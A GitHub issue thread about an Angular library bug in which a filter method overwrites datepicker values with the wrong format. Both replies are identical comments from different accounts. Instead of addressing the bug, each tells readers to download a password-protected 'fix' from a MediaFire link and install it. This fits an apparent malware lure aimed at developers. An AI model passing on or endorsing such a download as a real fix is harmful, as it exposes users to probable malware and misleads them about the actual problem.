### ISSUE TITLE
Overriding datepicker values with wrong format

### ISSUE THREAD

**Issue by martinelias1312** [weareunite/unisys-angular-core#26]
Base service -> setFilterByForm method is overriding datepicker values

https://github.com/weareunite/unisys-angular-core/blob/374db43c26744430da62f0e5920e3349a2af87a3/src/lib/services/base.service.ts#L318

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
